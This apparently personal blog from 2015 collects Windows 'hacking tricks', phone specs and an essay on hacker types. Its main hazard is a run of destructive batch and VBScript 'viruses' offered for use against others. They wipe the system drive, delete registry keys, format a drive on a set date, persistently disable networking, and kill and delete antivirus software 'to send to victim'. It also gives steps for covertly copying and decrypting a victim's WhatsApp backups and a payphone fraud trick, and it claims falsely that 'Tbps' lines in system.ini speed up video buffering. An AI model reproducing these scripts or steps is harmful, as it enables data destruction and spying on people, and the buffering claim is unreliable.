Monday, April 13, 2015


HOw Can We Hide The File In Image.


1. Gather the file you wish to bind, and the image file, and place them in a folder. I will be using C:\New Folder

-The image will hereby be referred to in all examples as xyz.jpg
-The file will hereby be referred to in all examples as New Text Document.txt

2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)

3. Open command prompt by going to Start > Run > cmd

4. In Command Prompt, navigate to the folder where your two files are by typing
cd location [ex: cd C:\New Folder]

5. Type [copy /b xyz.jpg + secret.rar xyz.jpg] (remove the brackets)

Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.

In order to view/extract your file, there are two options that you can take

a) Change the file extension from xyz.jpg to xyz.rar, then open and your file is there
b) Leave the file extension as is, right click, open with WinRar and your file is there

EnJoy HacKinG...


Contact Us:

 

Mohd Aalam husain 



3G Mobile Technology..




3G or the third-generation wireless refers to near future developments in personal & business wireless technology, especially relating to mobile communications. 3G or The Third Generation will usher in many benefits as roaming capability, broad bandwidth and high speed communication (upwards of 2Mbps).

indians were still waiting for 3G mobile services when other countries are forgetting 3G and looking towards 4G mobile technologies.


                      NOKIA

Nokia C6 and C7, make merry with 8MP camera and blacker ClearBlack screens:
Nokia has come out with two new Simbian^3 phones, being touted as “premium touchscreen”. They have a new screen technology with makes for blacker blacks and sharper colors. The screen incorporated in the C7, which is the new flagship model for the C series is 3.5 inch AMOLED and yes its capacitive touch. Both phones have 8MP cameras and shoot video at 720p resolution. Image gallery after the break.


NOKIA6760:

Push email is available through Nokia Messaging and instant messaging offers access to Google Talk and Windows Live Messenger. Built-in A-GPS with Nokia Maps offers 3D landmarks and terrain maps. Additional functions include a 2.4-inch QVGA display, 3.2-megapixel camera and support for up to 8GB of storage with microSD cards
General     2G Network GSM 850 / 900 / 1800 / 1900
3G Network     HSDPA 900 / 2100

Size:  Dimensions  97.5 x 57.9 x 15.5 mm, 78.5 cc
Weight: 123.9 g
Battery:- Standard battery, Li-Ion 1500 mAh (BP-4L)
Memory: Phonebook 1000 entries, Photocall
Call records:     Detailed, max 30 days
Internal: 128 MB storage
Card slot: microSD (TransFlash), up to 16GB, 2GB included,
                          SAMSUNG

Samsung’s i8700 Windows Phone 7 gets a video leak:



Everyone knows there are 4 stages to launching a new smartphone into the market, first leaked pics, then leaked video, after that leaked specs and finally the official release. So it seems we are at stage 2 with the Samsung i8700 Windows Phone 7,  as it gets it video leaked. Head past the break for the video.


SAMSUNG sgh-T559:



Samsung let loose two messaging phones today for T-Mobile USA. These phones are not feature packed but gives the full QWERTY keyboard goodness at a very affordable price. First up is Comeback (SGH-t559) and as we know, it is a dual screen horizontal flip phone that sports a full QWERTY keyboard, 3G, 2MP camera, music player, GPS and expandable memory up to 16GB

Gravity 2 (SGH-t469) takes the helm from the original Gravity and brings a horizontal sliding QWERTY keyboard, 2MP camera, music player, memory up to 16GB and boat load of T-Mobile services.
Samsung SGH-T559 Comeback comes with HTML Browser connect via UMTS, EDGE or GPRS Class 10 with the wireless connection via Bluetooth.
Comeback is already selling for $129.99 with a two-year agreement while Gravity 2 is expected to arrive in August.


                                LG

LG C320 InTouch Lady:

Specification:
Network 2G
GSM 850 / 900 / 1800 / 1900
3G
HSDPA 2100
Display Primary TFT, 256K colors, 320 x 240 pixels, 2.4 inches
Memory->Built-in 60 MB
Card Slot-> microSD, up to 32GB
Camera-> Main:-> 2 MP, 1600×1200 pixels
Video yes
    Autofocus, Digital zoom
Messaging: SMS, MMS, Email,Browser
WAP 2.0/xHTML Java MIDP 2.0, Radio FM radio, GPS
Others
- QWERTY keyboard , S-Class UI , 3.5mm audio jack,
SNS integration, MP3/WAV/eAAC+, MP4/H.264 player
- Organizer, Document viewer
- Voice memo, Predictive text input
Others
GPRS, EDGE, Bluetooth, USB


LG Xenon GR-500:


The LG Xenon GR500 phone weighs 3.8 ounces, pretty light for the pocket or any small handbag for the ladies. It is available in various colors of blue, black and magenta.
Technology:GSM
Frequency:GSM/GPRS/EDGE: 850/900/1800/1900 MHz (Quad-Band)
Data Transmission: GPRS/EDGE/HSDPA 3.6Mbps†
Dimensions: 4.16” (H) x 2.11” (W) x 0.62” (D)
Weight: 3.81 oz.
Display: 65K Color TFT, 240 x 400 Pixels, 2.80”
Standard Battery:950 mAh Li-Ion
Hackers are three types:-
 
1.    White hat hacker
2.    Gray hat hacker
3.    Black hat hacker


White Hat and Grey Hat Hacker & What is the Real Difference?
 
What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker.
However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that, these are very intelligent people.


So, what is ethical hacking white hat and how does it differentiate from grey hackers? The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts.

 

What Is A White Hat Hacker?
 
A hacker can be a wiz kid who spends too much time with computers and suddenly finds himself submerged in the world of  cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for him, or even worse, dominate the world.
In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent ma chines so that kind of scenario is a bit dramatic.

Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a determine code in a telephone in order to make free international calls.

 
 When computers appeared, this people found a new realm where they could exploit their skills. Now they were not limited to the constraints of the physical world, instead, they could travel through the virtual world of computers. Before the internet, they used Bulletin Board Systems (BBS) to communicate and exchange information. However, the real explosion occurred when the Internet appeared.

Today, anyone can become a hacker. Within that denomination, there are three types of hackers. The first one is the black hacker, also known as a cracker, someone who uses his computer knowledge in criminal activities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution for making some money.

On the other side is the white hat hacker. Although white hat hacking can be considered similar to a black hacker, there is an important difference. A white hacker does it with no criminal intention in mind. Companies around the world, who want to test their systems, contract white hackers. They will test how secure are their systems, and point any faults that they may found. If you want to become a hacker with a white hat, Linux, a PC and an internet connection is all you need.


Grey Hat Hackers

A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gains. Grey hackers use their skills in
order to prove themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hackers.
For example, they may hack the computer network of a public agency, let us say, NOAA. That is a federal crime. 

If the authorities capture them, they will feel the long arm of justice. However, if they only get inside, and post, let us say, their handle, and get out without causing any kind of damage, then they can be considered grey hackers.

If you want to know more about hackers, then you can attend one of their annual conventions. Every year, hackers from all over the US, and from different parts of the world, reunite and meet at DEF CON. These conventions are much concurred. In the last one, 6,600 people attended it.

Every year, DEF CON is celebrated at Las Vegas, Nevada. However, hackers are not the only ones who go to this event. There are also computer journalists, computer security professionals, lawyers, and employees of the federal government. The event is composed by tracks of different kind, all of them related, in some way, to the world of hackers (computer security, worms, viruses, new technologies, coding, etc). Besides the tracks, there are contests that involve hacking computers, l ock picking and even robot related events. Ethical hacking, white hat hacking or whatever names you wish to use, at the end, it has a purpose: to protect the systems of organizations, public or private, around the world. After all, hackers can now be located anywhere, and they can be counted by the millions. Soon, concepts like white hat, linux operating system or grey hat will become common knowledge. A real proof of how much has our society been influenced by technology.



Black Hat Hackers

Black hat hackers have become the iconic image of all hackers around the world. For the majority of computer users, the word hacker has become a synonym for social misfits and criminals.
Of course, that is an injustice created by our own interpretation of the mass media, so it is important for us to learn what a hacker is and what a black hacker (or cracker) does. So, let's learn about black hat techniques and how they make our lives a little more difficult.
Black hat is used to describe a hacker (or, if you prefer, cracker) who breaks into a computer system or network with malicious intent. Unlike a white hat hacker, the black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose. The black hat hacker may also make the exploit known to other hackers and/or the public without notifying the victim. This gives others the opportunity to exploit the vulnerability before the organization is able to secure it.

 
What Is Black Hat Hacking?
 
A black hat hacker, also known as a cracker or a dark side hacker (this last definition is a direct reference to the Star Wars movies and the dark side of the force), is someone who uses his skills with a criminal intent. Some examples are: cracking bank accounts in order to make transfernces to their own accounts, stealing information to be sold in the black market, or attacking the computer network of an organization for money.

Some famous cases of black hat hacking include Kevin Mitnick, who used his black hat hackers skills to enter the computers of organizations such as Nokia, Fujitsu, Motorola and Sun Microsystems (it must be mentioned that he is now a white hat hacker); Kevin Poulsen, who took control of all the phone lines in Los Angeles in order to win a radio contest (the prize was a Porsche 944 S2); and Vladimir Levin, which is the handle of the mastermind behind the stealing of $10'000,000 to Citigrou.



Contact Us:

 Mohd Aalam husain 


>>Hey Guys Diz Time Extreme Hack That You Will Never Imagine But Its Truth and We have Done It. 

This Time I will explain How to Install Windows XP In Just 10 minutes.<< Read On Enjoyyyyyy!~
As We all know that During Formatting a Computer After the File Copying is Completed then windows Require 39 Minutes Time...But What Extreme In It.... Yes We can Bypass this faking Time .... How TO DO IT??? So read On..
I have Included Snaps Shots That will help you.

>> INSTALLING WIN XP IN 10 MINUTES! <<
STEP1 : After the Copy Part is Over ... System is Rebooted as we all know In general Foramatting Procedure...
Now After Reboot The Below Image Will Appear....



STEP 2: Now As This Image APPEARS You Have to Press  "Shift + F10 "  . This Will Open The command Prompt...  Now type  taskmgr  in it. This will open the Task manager .

STEP 3 : After The task Manager Opens Goto Processes ... And Find "Setup.exe"  process and Right CLICK on It.... and set the Priority to Highest....




 
STEP 4: Now Just Watch the Set It will take around 9 minutes and 2 minutes for Tolerance(depends System to system)....

Thats the Overall Tutorial...Hope You all Have LIKED IT...

So When you Format your PC Next Time It will Really Save Your TIME i.e around 20 to 25 minutes....Enjoy Hacking.~


Contact Us :

Mohd Aalam husain 

IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .

 All Scripts Here Are To Be Copied In Note Pad


>>This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code a .bat file


>>Disable Internet Permanently
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


>>The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* |y

Save It As Anything.bat
 

>> This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

It Only Works With Windows XP


>>Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE


>>Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


>> Bomb Virus

Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit

And Save It As Anything.bat

Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day



>>Crazy caps lock

*This constantly turns caps lock on and off really fast continuously*

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


>>Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop


>>Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


What sex is your computer ?

-> open notepad
-> copy code
CreateObject("SAPI.SpVoice").Speak"I love YOU"

-> n paste on the Notepad
-> save as > love.vbs
-> double-click on it


Make Your Keyboard Disco Light

This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1.This piece of code makes ur keyboard a live disco..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

2.This one makes it looks like a chain of light….

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop

Instructions:
*paste any of the two above codes in notepad
*Save as “AnyFileName”.vbs
*Run the file
*To stop, launch task manager and then under “Processes” end “wscript.exe”

I hope u would like it..

How To Disable Victim Antivirus.

 Open Notepad Copy it and Paste To Notepad

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

Now Save this code as .bat and send to victim :)


>>Tasks Kill


@echo off

start calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

tskill explorer

tskill explorer

tskill explorer

tskill explorer

tskill explorer

pause

  save this as .bat file and send and destroy the victim & k!ll Operat!ng systeM!


>>Code type in notepad

@echo off
shutdown -r -f -t 00

>>Form Of Switches

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC. ..!!..!



>>Popping CD Drives


*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop



>> To make your pc talk

Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."

u will hear now what u typed..

this works in xp, vista, win7 also.

enjoy!!!


Contact Us :

 

Mohd Aalam husain 


On Daily we have heard news about online services is suffering from a lack of security. In February WhatsApp has been down for nearly four hours,
as if this were not enough, people became aware of the security flaw that allows conversations that should be read by anyone provided it learn properly perform the procedures.

Steps to follow:
1 - First of all you need to have the device at hand, use the Social Engineering and be quick in getting the e-mail and backup files msgstore-2014-05-02.1.db.crypt5.
To get the email for this follow the procedures below.


Enter the Play Store and view the e-mail, or write down mentalize somewhere without the person noticing.


Now Go to the device settings from Settings -> Accounts & Sync, look for the email from Google and mentalize or write down somewhere without the person noticing.


2 - Now let's take the msgstore-2014-05-08.1.db.crypt7 file To do this, use Polaris Office or any other app that allows you to navigate between folders and manage files.

Follow this path: My files -> WhatsApp -> Databases - In this directory you will find all the backup files of your messenger.
When you do find the file sharing for your mobile phone via bluetooth.






3 - Have we got the e-mail and file backup http://whatcrypt.com/?cmd=_decrypt
we
enter the site and send the backup file.

To Submit follows:
Account: Enter the email of the victim
Database: Select the database backup
Click Process / download zip
Save the zip file on your desktop


4 - Once you have downloaded the backup file in zip format we now need to download the tool to extract the backup and we have access to conversations. Save on the desktop.



5 - From the desktop to extract the file WhatsApp Decrypt.zip install python-3.4.0 folder and enter the WhatsApp.
Browse by: WhatsApp -> Whatsapp_Xtract_V2.1_2012-05-10-2


When you install python-3.4.0 do the following steps:
1 - Go to My Computer, click with the right mouse button and Properties -> Advanced System Settings
2 - In the System Properties navigate to the Advanced tab -> Environment Variables
3 - Environment Variables look for Path
4 - Edit the PATH
5 - At the end of PATH add ;C:\Python34
6 - Click ok and close
 

6 - Now extract the file from step 3 msgstore_decrypted on the desktop, copy and paste it on WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 and replace the file



7 - Replace the WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 from step 5 and
look for
msgstore.dll file, drag it onto the whatsapp_xtract_drag'n'drop_database file (s) _here


After you drag it will create a file called msgstore.db.html the folder and ask you to press any key at the command prompt to continue ...
Pressing any key it will open in your default browser displaying the file msgstore.db.html all conversations, dates, numbers, etc...

 
Note: In step 2 print shows the crypt 7 but the crypt is correct 5!


Disclaimer: This tutorial is educational purpose only. HOC is not responsible for any kind of illegal activities. We believe in Security.
 

 Contact Us :


Mohd Aalam husain


Sunday, April 12, 2015


Facebook or Fakebook ? 
 


How can you detect the Fake FB Profile. On these days we are getting so many friend request specially by girls, but there is no way to identify that account is fake or original. So don't worry we are going to tell you simple method to detect fake Facebook account.




So this is a Facebook account which named by Sarikha Agarwal. Now we need to verify this account real or fake, so our first step is going to the images.google.com and click on camera image.



                                                                                                 So when you click on search by image you will get popup like below image.




                                                                                                        Now go to that profile, right click on image and click on copy image URL




Now profile pic URL has copied.. now again go to images.google.com Tab and paste image URL 

When you enter then you get related images search...


Now you can better see that this profile is real or fake..So here is a proof that this profile is fake. Enjoy the trick..

Be aware when you will going to add an beautiful or smart unknown person as your friend. So be checked first.. there are lot of fake profiles are create everyday.
This person might be spy on your profile and steal personal information like your photos, etc for their hacking stuffs.. So Be Safe Online..



Contact Us : 


Mohd Aalam husain 
  How To Trace Your Facebook Profile Visitors

Now here we found who recently visited your profile.
Follow below steps for get to know your FB recent visitors
.

Step 1) Go to your Facebook Profile Page.
Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page.
Step 3) Now press Ctrl + F from your keyboard to open search box.
Step 4) Now search this code {"list":
Step 5) You find some Facebook Profile Ids are like shown below. Click on example image for zoom.

Step 6) There are some Facebook Profile Ids of your friends who visited recently.
Step 7) The first one ID's are showing visits the most number of time.
Step 8) Now if your want to findout, Open a new tab Enter below link : www.facebook.com/Facebook Profile Id
For Example : www.facebook.com/100001257992988
Enjoy The Trick.. :)
 
 
 
Contact Us : 
 

    AVOID FRIEND REQUEST BLOCK
   
  We usually send friend requests and if it's not accepted it is kept in pending.
If  there are lots of pending requests it may lead to block.
  
So this is a simple way to get those requests cancelled and protect your account from being blocked.

    Follow below steps :-

    1. Go to account settings.
    2. Select `download a copy` option.


    3. Choose `expanded archive` from the next page opened and enter your   password and click continue.
    4. Select `start my archive`.
    5. After a few hours you'll get the download link in your email.
    5. Download the file `facebook` and unzip it.
    6. Open the folder html and then `friend_requests.htm­l`.
    7. You can see the list of your friend requests and pending lists.
    Now goto their accounts and click`cancel request.

    That's all You are done now. Your account is safe.

Make a photo background in drives Perform the following steps ..>>
 Open notepad and copy the following code :
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=D:\Wallpapers\celeb\Genelia.jpg
iconarea_text=0x00FFFFFF

 Here, the path in the 2nd line of code represents the path of your picture. so just change at dere only....
 Now save this file as DESKTOP.INI in the location(any drive or any folder) where you desire to set the background picture.
 After setting it in your favourite location,close the drive and open the location again.
DONE !! .. your picture has been set as background picture for your desired location.
 

NOTE : Make sure that the extension in the path should be .jpg only and file should be saved as DESKTOP.INI only.


OPEN BLOCK WEB USING CALCULATOR
Now access the internet via your standard Microsoft Calculator using this trick.
You can do this for fun or when your browser is messed up for some unexplainable reason.

Steps:

1. Open your MS Calculator. This is normally found in Start => All Programs => Accessories => Calculator.

2. Open the help-window by pressing the F1 key.

3. Click the top-left corner icon of the help window once (Standard is a Document with a Question mark).

4. Select 'Jump to URL'.

5. Type your address into the available field, but remember to type http://, and not just www. (or equivalent).
Have f
un !!!


Run Firefox inside Firefox :-

How to run Firefox inside Firefox.?

Yup you can run Firefox inside firefox just by typing following url.

How about Opening Firefox inside Firefox which is again in another Firefox..?
Not bad huh?
And its really easy too just type in this url in Firefox's address bar and there you go!
Firefox inside Firefox!

copy paste following url in a web browser (mozilla firefox).

chrome://browser/content/browser.xul


Above screenshot of this trick (firefox in firefox in firefox, which is again in another firefox)-... :p


Prevent system auto shutdown by a virus

Within the time limit click start > run:-
Just Type:
shutdown /a

n press enter...
here u done no force shutdown by virus~!

Coin Box Calling HackSteps:
1.Insert Coin
2.Dial 0##Phone No. *(star)
3.Call Unlimited
4.And Disconnect
5.Coin Comes Out 
6.Go Home Smiling...~
 
 
 
How to Shutdown PC with timer
Do you know that you can make your PC shutdown at a time u wish to?
Here is the trick!!
How To Make A Shutdown Timer!
********** METHOD 1 ***************
1.    Right click on your desktop and choose "New=>shortcuts".
2.    In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next. Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.
3.    Make up a name for the shortcut and you're done.
You can change the icon by right clicking=>properities=>change icon=>browse
TO ABORT:
To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.
********* METHOD 2 *************
Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in

start=>Run
Type Code: at 11:35 shutdown -s

TO ABORT:
Code:shutdown -a

MAKE UR PC TALK
Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."

u will hear what u typed this works in xp,may be in vista also.

enjoy!!! 



 Reveal *****(Asterisk) Passwords Using Javascript :-

 Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

 Follow the steps given below-

 1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

 2) Type your 'Username' and 'Password'.

 3) Copy and paste the JavaScript code given below into your browser's address bar and  press 'Enter'.

                 javascript: alert(document.getElementById('Passwd').value);

 4) As soon as you press 'Enter', A window pops up showing Password typed by you..!



How to increase youtube/metacafe buffering speed

Wid this procedure
u can increase the buffering speed of uploaded videos
try it
porn

steps>>

1.start
2.run
3.type--system.ini

after that ull get system notepad file as
; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON


jus below this copy
this-------------->
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps

so totally it will look as for 16-bit app support
 
 
 
 
 
 
 
 
 Contact Us :
 
 
 
 

Recover My Files


Recover My Files data recovery software will recover deleted files emptied from the Windows Recycle Bin, or lost due to the format or corruption of a hard drive, virus or Trojan infection, unexpected system shutdown or software failure.

Recover My Files - Data Recovery SoftwareSolution
Recover files even if emptied from the Recycle Bindata
File recovery after accidental format, even if you have reinstalled Windows.recovery
Disk recovery after a hard disk crashsoftware
Get back files after a partitioning errordata
Get data back from RAW hard drivesRAW drive
Recover documents, photos, video music and email.recovery
Recover from hard drive, camera card, USB, Zip, floppy disk or other mediasoftware



Data Recovery Software Download
Current Version: 4.6.8.1012
Data recovery software download
100% Safe, 100% Secure

To Recover deleted or corrupt photos:

DiskInternals Flash Recovery 4.2 full download using which you can recover deleted or corrupted photos within few seconds. Isn't that nice, its best that you can recover all your deleted data from the flash memory cards used in cameras.

DiskInternals Flash Recovery is a flash memory file recovery tool that restores all corrupted and deleted photographs or the ones that were lost due to hardware malfunction. This utility works even if a memory card was re-formatted.



Features:
• Easy Recovery Wizard.
• Can preview and recover JPEG, JPG, TIFF, BMP, PNG, GIF, TGA and other images.
• Can preview and recover RAW images:
• CRW - Canon Digital Camera Raw Image Format.
• CR2 - Canon Digital Camera Raw Image Format version 2.0.
• NEF - Nikon Digital SLR Camera Raw Image File.
• PEF - Pentax Raw Image Format
• RAF - Fuji CCD-RAW Graphic File.
• X3F - Sigma Camera RAW Picture File.
• BAY - Kodak/Roper Bayer Picture Sequence.
• ORF - Descent 3 Outrage Room Format.
• MRW - Minolta Diamage Raw Image File.
• RAW - Image Alchemy HSI Temporary Raw Bitmap
• SRF - Sony DSC-F828 Raw Image File.
• Other RAW images
• Works under Microsoft® Windows® 95, 98, ME, NT, 2000, XP, 2003 Server.
• Supported file systems: FAT12, FAT16, FAT32, NTFS (NT 4), NTFS5 (2000, XP).
• Recovered files can be saved on any (including network) disks visible to the host operating system.
• Creates recovery snapshot files for logical drives. Such files can be processed like regular disks.
                                                                                                 
                                                                                          To Download
DiskInternals Flash 

Recovery 4.2 full download









Data recovery software download 


Contact Us :

 Mohd Aalam Husain